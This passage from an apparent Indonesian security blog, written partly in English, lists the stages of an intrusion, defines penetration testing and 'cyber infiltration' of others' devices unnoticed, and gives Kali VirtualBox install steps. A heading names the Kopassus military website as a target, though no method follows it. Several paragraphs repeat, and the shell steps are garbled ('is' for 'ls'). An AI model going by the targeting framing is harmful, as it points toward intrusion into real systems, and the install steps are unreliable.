adalah tahap pemetaan atau pemilah-milahan terhadap system suatu jaringan. Memilah sejauh mana tingkat kemanan system tersebut.
3. VA ( Vulnerability Acces / Tingkat kerentanan kena gangguan )
adalah tahap dimana kita mengetahui titik kerentanan suatu system untuk kita akses atau masuki.
4. Eksploitasi ( Menerobos Masuk )
adalah suatu cara menerobos masuk ke dalam system jaringan lain setelah kita melaksanakan tahap IG, SE, VA.
Cara mencari tahu ttg sistem Website Kopassus
Yang dimaksud dgn Webside itu apa ?
Nah dari makna itu, bisa kita fahami bahwa definisi website secara sederhana adalah informasi apa saja yang bisa di akses dengan menggunakan koneksi jaringan internet.
UNDERSTANDING THE WEBSITE OR WEBSITES
In the meaning of the WEBSITE is a collection of pages of information provided via the Internet that can be accessed around the world over
network connected to the Internet. The website is a component that consists of text, images, sound animation so that it becomes a media information of interest to be visited by others.
Well from that meaning, we can understand it in a simple website that definition is any information that can be accessed by using the Internet network connection.
PENGERTIAN WEBSITE ATAU SITUS WEB
Secara makna sebuah WEBSITE adalah sekumpulan halaman informasi yang disediakan melalui jalur internet sehingga bisa diakses di seluruh dunia selama terkoneksi dengan jaringan internet. Website merupakan sebuah komponen yang terdiri dari teks, gambar, suara animasi sehingga menjadi media informasi yang menarik untuk dikunjungi oleh orang lain.Nah dari makna itu, bisa kita fahami bahwa definisi website secara sederhana adalah informasi apa saja yang bisa di akses dengan menggunakan koneksi jaringan internet.
UNDERSTANDING THE WEBSITE OR WEBSITES
In the meaning of the WEBSITE is a collection of pages of information provided via the Internet that can be accessed around the world over
network connected to the Internet. The website is a component that consists of text, images, sound animation so that it becomes a media information of interest to be visited by others.
Well from that meaning, we can understand it in a simple website that definition is any information that can be accessed by using the Internet network connection.
Minggu, 16 Agustus 2015
What is Penetration testing
Penetration Testing
adalah metode untuk mengevaluasi keamanan sistem komputer atau jaringan
dengan mensimulasikan serangan dari sumber yang berbahaya. Sebagai
contoh serangan yang dilakukan oleh “Black Hat Hacker”, “Cracker”,
“Defacer”, Dsb.
Proses ini melibatkan analisis aktif terhadap sistem untuk setiap kerentanan potensial yang diakibatkan oleh sistem yang lemah atau konfigurasi sistem yang tidak benar atau kelemahan operasional dalam proses teknis. Masalah keamanan yang ditemukan akan disampaikan kepada pemilik sistem bersama dengan penilaian dampak dan mitigasi (solusi teknis) dari setiap kerentanan yang ditemukan.
Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui serangan-serangan yang bisa terjadi terhadap kerentanan yang ada pada sistem, mengetahui dampak bisnis yang diakibatkan dari hasil ekpoitasi yang dilakukan oleh penyerang.
Penetration Testing adalah salah satu komponen penting dari Security Audit .
Penetration Testing is a method for evaluating the security of a computer system or network by simulating an attack from a dangerous source. For example, attacks carried out by the "Black Hat Hacker", "Cracker", "Defacer", Etc.
The process involves an active analysis of the system for any potential vulnerabilities caused by weak systems or improper system configuration or operational weaknesses in the technical process. Security issues found will be presented to the owner of the system together with the impact assessment and mitigation (technical solution) of any vulnerabilities found.
Penetration Testing purpose of which is to define and determine the attacks that can happen against the vulnerabilities that exist in the system, knowing the business impact resulting from ekpoitasi results conducted by the attacker.
Penetration Testing is one important component of the Security Audit.
Proses ini melibatkan analisis aktif terhadap sistem untuk setiap kerentanan potensial yang diakibatkan oleh sistem yang lemah atau konfigurasi sistem yang tidak benar atau kelemahan operasional dalam proses teknis. Masalah keamanan yang ditemukan akan disampaikan kepada pemilik sistem bersama dengan penilaian dampak dan mitigasi (solusi teknis) dari setiap kerentanan yang ditemukan.
Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui serangan-serangan yang bisa terjadi terhadap kerentanan yang ada pada sistem, mengetahui dampak bisnis yang diakibatkan dari hasil ekpoitasi yang dilakukan oleh penyerang.
Penetration Testing adalah salah satu komponen penting dari Security Audit .
Penetration Testing is a method for evaluating the security of a computer system or network by simulating an attack from a dangerous source. For example, attacks carried out by the "Black Hat Hacker", "Cracker", "Defacer", Etc.
The process involves an active analysis of the system for any potential vulnerabilities caused by weak systems or improper system configuration or operational weaknesses in the technical process. Security issues found will be presented to the owner of the system together with the impact assessment and mitigation (technical solution) of any vulnerabilities found.
Penetration Testing purpose of which is to define and determine the attacks that can happen against the vulnerabilities that exist in the system, knowing the business impact resulting from ekpoitasi results conducted by the attacker.
Penetration Testing is one important component of the Security Audit.
How to instal Virtualbox on your operating system
Steps to instal Virtualbox :
1. Copy Virtualbox Software from Flasdisk to Computer
2. Click Application
3. Click System tools
4. Click UX Term ( Will appear the name of the kali/port
5. If Appear # mean in Root
6. If appear $ ( type ) sudo ( space ) -s ( type ) Password
7. # ( type ) cd ( space ) / home
8. # ( type ) is
9. # ( type ) cd ( space ) Name
10. # ( type ) is
11. # ( type ) cd ( space ) docu ments or desktop...etc
12. # ( type ) is
13 . # ( type ) dpkg ( space ) -i ( space ) virtualbox
1. Copy Virtualbox Software from Flasdisk to Computer
2. Click Application
3. Click System tools
4. Click UX Term ( Will appear the name of the kali/port
5. If Appear # mean in Root
6. If appear $ ( type ) sudo ( space ) -s ( type ) Password
7. # ( type ) cd ( space ) / home
8. # ( type ) is
9. # ( type ) cd ( space ) Name
10. # ( type ) is
11. # ( type ) cd ( space ) docu ments or desktop...etc
12. # ( type ) is
13 . # ( type ) dpkg ( space ) -i ( space ) virtualbox
Tell about your operating system ( kali/parrot )
kali system operation is an operating system that develops security applications. by way of disabling a network by default and allows to install multiple network services, regardless of which package is installed but remain in a safe condition.
what is cyber inteligence
a technique or a way to get the data and then process that data into an intelligence product by using the Internet as a medium to get a value to be used by the user to take further action.
what is cyber infiltration
a method or technique to get into the other party internet device without being noticed by the other party to obtain data or information using the Internet as a medium.
Langganan:
Komentar (Atom)








































